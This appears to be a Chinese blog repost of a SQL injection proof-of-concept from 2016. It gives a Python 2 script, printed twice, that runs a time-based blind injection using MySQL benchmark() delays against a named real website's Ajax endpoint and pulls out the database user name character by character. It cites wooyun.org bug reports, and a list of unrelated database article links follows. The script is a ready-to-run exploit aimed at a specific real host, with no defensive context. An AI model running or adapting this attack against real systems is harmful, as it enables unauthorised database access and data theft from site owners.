SQL注入POC
2016-03-03 09:43
393 查看
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,20):
for payload in payloads:
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = "if(%s,benchmark(2000000,md5(1)),0)" % s
conn = httplib.HTTPConnection('wacom2012.wacom.com.cn', timeout=30)
conn.request(method='GET',url="/AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity" % urllib.quote(s), headers = headers)
start_time = time.time()
conn.getresponse()
conn.close()
print '.',
#print time.time() - start_time
if time.time() - start_time >2:
user += payload
print '\n[In progress]', user,
#time.sleep(4.0)
break
print '\n[Done]MySQL user is %s' % user
from
http://wooyun.org/bugs/wooyun-2010-0170936http://zone.wooyun.org/content/25653
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
for i in range(1,20):
for payload in payloads:
s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
s = "if(%s,benchmark(2000000,md5(1)),0)" % s
conn = httplib.HTTPConnection('wacom2012.wacom.com.cn', timeout=30)
conn.request(method='GET',url="/AjaxRequest/Ajax_Page.aspx?id=%s&method=getregprocity" % urllib.quote(s), headers = headers)
start_time = time.time()
conn.getresponse()
conn.close()
print '.',
#print time.time() - start_time
if time.time() - start_time >2:
user += payload
print '\n[In progress]', user,
#time.sleep(4.0)
break
print '\n[Done]MySQL user is %s' % user
from
http://wooyun.org/bugs/wooyun-2010-0170936http://zone.wooyun.org/content/25653
相关文章推荐
- Oracle数据库分区技术
- memcache集群安装
- oracle中的exists 和not exists 用法详解
- 关于处理小数点位数的几个oracle函数()
- mysql 主从同步过程详解、主从延迟原理分析
- mysql数据库存储路径更改 数据文件位置
- Oracle11g 重建EM
- SQLite3学习笔记
- ORACLE数据库在导入导出时序列不一致的问题
- MongoDB的save 和insert函数的区别
- Hadoop Pig学习笔记 各种SQL在PIG中实现
- 理解MySQL——架构与概念
- 做一个合格的程序猿之MYSQL 使用心得(一)
- SqlServer调用外部程序实现数据同步
- 数据库框架之Greendao从无到有(一)
- oracle下lag和lead分析函数
- mysql 查询死锁以及解锁
- SQL SERVER with递归示例一则
- redis-windows服务安装
- Mac 安装 MySQL